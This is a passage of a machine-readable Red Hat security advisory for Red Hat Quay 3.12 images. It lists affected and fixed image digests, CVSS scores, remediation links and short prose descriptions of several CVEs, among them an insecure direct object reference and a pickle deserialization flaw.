          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ec3dc9f6eb57ec9dca9ef4c61d3671f2cca32910ca5c7cc37e2f8e1159594fcc_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6530ab268b54cf9a6cd2166dc89ae86b7e908a4ed26301440f69a6ca7af4a4e9_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:002bb098e96b7521e2a9ecc5aac3c4a488d46cd34b10297bde34875101b8d6bc_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:34885b92ee88d400d16f1bc86452d418c79b2f979136614b3887cec67fa353d5_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c0fde56c49356b322ce15194f8da85ea16cd2a7a80a6c8e7d38b94e22cc6e8a_s390x",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:8745cd1c93673e8b33cd80758d16b96f49f49d28fbfce60a069578cb17baa88c_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:d91c880570c005cb2edcb07d29f8df09504b65710dde2b0c95d17c139c92b777_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:27ab48d03362b795605f841ec15ac20b869e8bd6e69a783d9be7643f6af33a93_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:5195314fca91a9531d77397274098564c8e3271f0a9f3adcc4b65b0dc8e2aa8b_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:65750c25a337679bbecb7ff4e443df5df76f089ce27952203863d80710b15e06_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:e6855bb1099a4bb1b0e53d7ee2359edd8f0b35eafd785eae32eeb7a9939eda72_s390x",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:9da58edb2793b2a2fe559fbf9764c251a1fc19a3062956f39e0f138ebb0efffd_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:124bada0022d71ad1c20aba7350af8625eac26ef81f89154d22a5f7b8d74820e_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:14aa439dcd023927e6d6f27d3695bf99cf0aabe11f4c86f767ef2186bd9b886c_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:9756cfa3d2ed7bcf1c680c9003e0ed90247c4cf8aac020d01ad927058b3b45e1_s390x",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:f8b228501a85e99cc3f3c6af1b8f927c72c5f779ef4db74e4706d2d46042800b_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-32589"
        },
        {
          "category": "external",
          "summary": "RHBZ#2446963",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2446963"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-32589",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-32589"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-32589",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32589"
        }
      ],
      "release_date": "2026-04-08T00:00:00+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-06-02T18:16:29+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
          "product_ids": [
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:6e84443d520fc3f75352783c17e4262db596b6a7b194970f0cb276e52aa7cb26_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:80c3d7a1c4b60d82101d6ab598498977fd7e5e6c3a82be0c44afec6fb84cb45a_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:c8de70845d1b044f955b1bcdab78ea997a665a9322b3fb8635602679292d8978_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:f88e76824ab3d5d3b054bb79c33fc5bf8183238a8bf3e963d978437b0cfa2d69_s390x"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:22629"
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 7.4,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "privilegesRequired": "LOW",
            "scope": "CHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L",
            "version": "3.1"
          },
          "products": [
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:029c3754ef9adb693785cbb90855eac14da6ff7319b581e06fa80a319b4b397f_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:37b54107d51f1aa0aa0bfd02e5373bc5c17fe98521b4a065126fe76a9b5d4a8f_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:8e1fcc9086776db526a1b2fcbb7c068d71e82eef7098b7df0f72d6a7995bcd7e_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:b59d8c379e69debc315b9cad3e155ff2a6e458426b76bb1b6d86e2cf08c56557_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:bfae5410144f3a5b76847634efb9d78407591df98e67f639796e212a4739128b_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:034737d3954911f9371c0422ef1b204ba00546d53febfe55ee704e0df2b57682_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:cfebea8a32ebeec3963d3b41f8161fd65f698c20d1ffa1f03c630d776c612c93_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:e289bf320046335ecf1d032c3add538a539b0f8ded8bca56d0a3c4655f712720_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ec3dc9f6eb57ec9dca9ef4c61d3671f2cca32910ca5c7cc37e2f8e1159594fcc_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6530ab268b54cf9a6cd2166dc89ae86b7e908a4ed26301440f69a6ca7af4a4e9_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:002bb098e96b7521e2a9ecc5aac3c4a488d46cd34b10297bde34875101b8d6bc_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:34885b92ee88d400d16f1bc86452d418c79b2f979136614b3887cec67fa353d5_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c0fde56c49356b322ce15194f8da85ea16cd2a7a80a6c8e7d38b94e22cc6e8a_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:8745cd1c93673e8b33cd80758d16b96f49f49d28fbfce60a069578cb17baa88c_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:d91c880570c005cb2edcb07d29f8df09504b65710dde2b0c95d17c139c92b777_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:27ab48d03362b795605f841ec15ac20b869e8bd6e69a783d9be7643f6af33a93_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:5195314fca91a9531d77397274098564c8e3271f0a9f3adcc4b65b0dc8e2aa8b_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:65750c25a337679bbecb7ff4e443df5df76f089ce27952203863d80710b15e06_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:e6855bb1099a4bb1b0e53d7ee2359edd8f0b35eafd785eae32eeb7a9939eda72_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:9da58edb2793b2a2fe559fbf9764c251a1fc19a3062956f39e0f138ebb0efffd_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:124bada0022d71ad1c20aba7350af8625eac26ef81f89154d22a5f7b8d74820e_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:14aa439dcd023927e6d6f27d3695bf99cf0aabe11f4c86f767ef2186bd9b886c_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:9756cfa3d2ed7bcf1c680c9003e0ed90247c4cf8aac020d01ad927058b3b45e1_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:f8b228501a85e99cc3f3c6af1b8f927c72c5f779ef4db74e4706d2d46042800b_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:6e84443d520fc3f75352783c17e4262db596b6a7b194970f0cb276e52aa7cb26_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:80c3d7a1c4b60d82101d6ab598498977fd7e5e6c3a82be0c44afec6fb84cb45a_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:c8de70845d1b044f955b1bcdab78ea997a665a9322b3fb8635602679292d8978_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:f88e76824ab3d5d3b054bb79c33fc5bf8183238a8bf3e963d978437b0cfa2d69_s390x"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "mirror-registry: quay: insecure direct object reference in BlobUpload"
    },
    {
      "acknowledgments": [
        {
          "names": [
            "Antony Di Scala",
            "Michael Whale"
          ]
        }
      ],
      "cve": "CVE-2026-32590",
      "cwe": {
        "id": "CWE-502",
        "name": "Deserialization of Untrusted Data"
      },
      "discovery_date": "2026-03-12T14:43:11.443000+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:029c3754ef9adb693785cbb90855eac14da6ff7319b581e06fa80a319b4b397f_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:37b54107d51f1aa0aa0bfd02e5373bc5c17fe98521b4a065126fe76a9b5d4a8f_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:8e1fcc9086776db526a1b2fcbb7c068d71e82eef7098b7df0f72d6a7995bcd7e_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:b59d8c379e69debc315b9cad3e155ff2a6e458426b76bb1b6d86e2cf08c56557_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:bfae5410144f3a5b76847634efb9d78407591df98e67f639796e212a4739128b_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:034737d3954911f9371c0422ef1b204ba00546d53febfe55ee704e0df2b57682_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:cfebea8a32ebeec3963d3b41f8161fd65f698c20d1ffa1f03c630d776c612c93_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:e289bf320046335ecf1d032c3add538a539b0f8ded8bca56d0a3c4655f712720_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ec3dc9f6eb57ec9dca9ef4c61d3671f2cca32910ca5c7cc37e2f8e1159594fcc_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6530ab268b54cf9a6cd2166dc89ae86b7e908a4ed26301440f69a6ca7af4a4e9_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:002bb098e96b7521e2a9ecc5aac3c4a488d46cd34b10297bde34875101b8d6bc_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:34885b92ee88d400d16f1bc86452d418c79b2f979136614b3887cec67fa353d5_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c0fde56c49356b322ce15194f8da85ea16cd2a7a80a6c8e7d38b94e22cc6e8a_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:8745cd1c93673e8b33cd80758d16b96f49f49d28fbfce60a069578cb17baa88c_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:d91c880570c005cb2edcb07d29f8df09504b65710dde2b0c95d17c139c92b777_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:27ab48d03362b795605f841ec15ac20b869e8bd6e69a783d9be7643f6af33a93_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:5195314fca91a9531d77397274098564c8e3271f0a9f3adcc4b65b0dc8e2aa8b_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:65750c25a337679bbecb7ff4e443df5df76f089ce27952203863d80710b15e06_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:e6855bb1099a4bb1b0e53d7ee2359edd8f0b35eafd785eae32eeb7a9939eda72_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:9da58edb2793b2a2fe559fbf9764c251a1fc19a3062956f39e0f138ebb0efffd_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:124bada0022d71ad1c20aba7350af8625eac26ef81f89154d22a5f7b8d74820e_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:14aa439dcd023927e6d6f27d3695bf99cf0aabe11f4c86f767ef2186bd9b886c_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:9756cfa3d2ed7bcf1c680c9003e0ed90247c4cf8aac020d01ad927058b3b45e1_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:f8b228501a85e99cc3f3c6af1b8f927c72c5f779ef4db74e4706d2d46042800b_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2446964"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in Red Hat Quay\u0027s handling of resumable container image layer uploads. The upload process stores intermediate data in the database using a format that, if tampered with, could allow an attacker to execute arbitrary code on the Quay server.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "mirror-registry: remote code execution using pickle deserialization",
          "title": "Vulnerability summary"
        },
        {
          "category": "other",
          "text": "Exploitation requires valid login credentials. The attacker must be authenticated to the registry, either through the web interface or through a container tool such as Podman.",
          "title": "Statement"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:6e84443d520fc3f75352783c17e4262db596b6a7b194970f0cb276e52aa7cb26_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:80c3d7a1c4b60d82101d6ab598498977fd7e5e6c3a82be0c44afec6fb84cb45a_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:c8de70845d1b044f955b1bcdab78ea997a665a9322b3fb8635602679292d8978_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:f88e76824ab3d5d3b054bb79c33fc5bf8183238a8bf3e963d978437b0cfa2d69_s390x"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:029c3754ef9adb693785cbb90855eac14da6ff7319b581e06fa80a319b4b397f_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:37b54107d51f1aa0aa0bfd02e5373bc5c17fe98521b4a065126fe76a9b5d4a8f_s390x",
          "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:8e1fcc9086776db526a1b2fcbb7c068d71e82eef7098b7df0f72d6a7995bcd7e_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:b59d8c379e69debc315b9cad3e155ff2a6e458426b76bb1b6d86e2cf08c56557_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:bfae5410144f3a5b76847634efb9d78407591df98e67f639796e212a4739128b_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:034737d3954911f9371c0422ef1b204ba00546d53febfe55ee704e0df2b57682_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:cfebea8a32ebeec3963d3b41f8161fd65f698c20d1ffa1f03c630d776c612c93_s390x",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:e289bf320046335ecf1d032c3add538a539b0f8ded8bca56d0a3c4655f712720_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ec3dc9f6eb57ec9dca9ef4c61d3671f2cca32910ca5c7cc37e2f8e1159594fcc_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6530ab268b54cf9a6cd2166dc89ae86b7e908a4ed26301440f69a6ca7af4a4e9_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:002bb098e96b7521e2a9ecc5aac3c4a488d46cd34b10297bde34875101b8d6bc_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:34885b92ee88d400d16f1bc86452d418c79b2f979136614b3887cec67fa353d5_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c0fde56c49356b322ce15194f8da85ea16cd2a7a80a6c8e7d38b94e22cc6e8a_s390x",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:8745cd1c93673e8b33cd80758d16b96f49f49d28fbfce60a069578cb17baa88c_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:d91c880570c005cb2edcb07d29f8df09504b65710dde2b0c95d17c139c92b777_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:27ab48d03362b795605f841ec15ac20b869e8bd6e69a783d9be7643f6af33a93_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:5195314fca91a9531d77397274098564c8e3271f0a9f3adcc4b65b0dc8e2aa8b_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:65750c25a337679bbecb7ff4e443df5df76f089ce27952203863d80710b15e06_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:e6855bb1099a4bb1b0e53d7ee2359edd8f0b35eafd785eae32eeb7a9939eda72_s390x",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:9da58edb2793b2a2fe559fbf9764c251a1fc19a3062956f39e0f138ebb0efffd_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:124bada0022d71ad1c20aba7350af8625eac26ef81f89154d22a5f7b8d74820e_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:14aa439dcd023927e6d6f27d3695bf99cf0aabe11f4c86f767ef2186bd9b886c_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:9756cfa3d2ed7bcf1c680c9003e0ed90247c4cf8aac020d01ad927058b3b45e1_s390x",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:f8b228501a85e99cc3f3c6af1b8f927c72c5f779ef4db74e4706d2d46042800b_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-32590"
        },
        {
          "category": "external",
          "summary": "RHBZ#2446964",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2446964"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-32590",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-32590"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-32590",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32590"
        }
      ],
      "release_date": "2026-04-08T00:00:00+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-06-02T18:16:29+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
          "product_ids": [
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:6e84443d520fc3f75352783c17e4262db596b6a7b194970f0cb276e52aa7cb26_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:80c3d7a1c4b60d82101d6ab598498977fd7e5e6c3a82be0c44afec6fb84cb45a_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:c8de70845d1b044f955b1bcdab78ea997a665a9322b3fb8635602679292d8978_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:f88e76824ab3d5d3b054bb79c33fc5bf8183238a8bf3e963d978437b0cfa2d69_s390x"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:22629"
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.1,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          "products": [
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:029c3754ef9adb693785cbb90855eac14da6ff7319b581e06fa80a319b4b397f_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:37b54107d51f1aa0aa0bfd02e5373bc5c17fe98521b4a065126fe76a9b5d4a8f_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:8e1fcc9086776db526a1b2fcbb7c068d71e82eef7098b7df0f72d6a7995bcd7e_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:b59d8c379e69debc315b9cad3e155ff2a6e458426b76bb1b6d86e2cf08c56557_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:bfae5410144f3a5b76847634efb9d78407591df98e67f639796e212a4739128b_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:034737d3954911f9371c0422ef1b204ba00546d53febfe55ee704e0df2b57682_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:cfebea8a32ebeec3963d3b41f8161fd65f698c20d1ffa1f03c630d776c612c93_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:e289bf320046335ecf1d032c3add538a539b0f8ded8bca56d0a3c4655f712720_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ec3dc9f6eb57ec9dca9ef4c61d3671f2cca32910ca5c7cc37e2f8e1159594fcc_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6530ab268b54cf9a6cd2166dc89ae86b7e908a4ed26301440f69a6ca7af4a4e9_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:002bb098e96b7521e2a9ecc5aac3c4a488d46cd34b10297bde34875101b8d6bc_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:34885b92ee88d400d16f1bc86452d418c79b2f979136614b3887cec67fa353d5_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c0fde56c49356b322ce15194f8da85ea16cd2a7a80a6c8e7d38b94e22cc6e8a_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:8745cd1c93673e8b33cd80758d16b96f49f49d28fbfce60a069578cb17baa88c_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:d91c880570c005cb2edcb07d29f8df09504b65710dde2b0c95d17c139c92b777_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:27ab48d03362b795605f841ec15ac20b869e8bd6e69a783d9be7643f6af33a93_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:5195314fca91a9531d77397274098564c8e3271f0a9f3adcc4b65b0dc8e2aa8b_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:65750c25a337679bbecb7ff4e443df5df76f089ce27952203863d80710b15e06_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:e6855bb1099a4bb1b0e53d7ee2359edd8f0b35eafd785eae32eeb7a9939eda72_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:9da58edb2793b2a2fe559fbf9764c251a1fc19a3062956f39e0f138ebb0efffd_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:124bada0022d71ad1c20aba7350af8625eac26ef81f89154d22a5f7b8d74820e_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:14aa439dcd023927e6d6f27d3695bf99cf0aabe11f4c86f767ef2186bd9b886c_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:9756cfa3d2ed7bcf1c680c9003e0ed90247c4cf8aac020d01ad927058b3b45e1_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:f8b228501a85e99cc3f3c6af1b8f927c72c5f779ef4db74e4706d2d46042800b_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:6e84443d520fc3f75352783c17e4262db596b6a7b194970f0cb276e52aa7cb26_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:80c3d7a1c4b60d82101d6ab598498977fd7e5e6c3a82be0c44afec6fb84cb45a_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:c8de70845d1b044f955b1bcdab78ea997a665a9322b3fb8635602679292d8978_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:f88e76824ab3d5d3b054bb79c33fc5bf8183238a8bf3e963d978437b0cfa2d69_s390x"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Moderate"
        }
      ],
      "title": "mirror-registry: remote code execution using pickle deserialization"
    },
    {
      "cve": "CVE-2026-33894",
      "cwe": {
        "id": "CWE-347",
        "name": "Improper Verification of Cryptographic Signature"
      },
      "discovery_date": "2026-03-27T21:02:52.462999+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:029c3754ef9adb693785cbb90855eac14da6ff7319b581e06fa80a319b4b397f_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:37b54107d51f1aa0aa0bfd02e5373bc5c17fe98521b4a065126fe76a9b5d4a8f_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:8e1fcc9086776db526a1b2fcbb7c068d71e82eef7098b7df0f72d6a7995bcd7e_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:b59d8c379e69debc315b9cad3e155ff2a6e458426b76bb1b6d86e2cf08c56557_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:bfae5410144f3a5b76847634efb9d78407591df98e67f639796e212a4739128b_amd64",
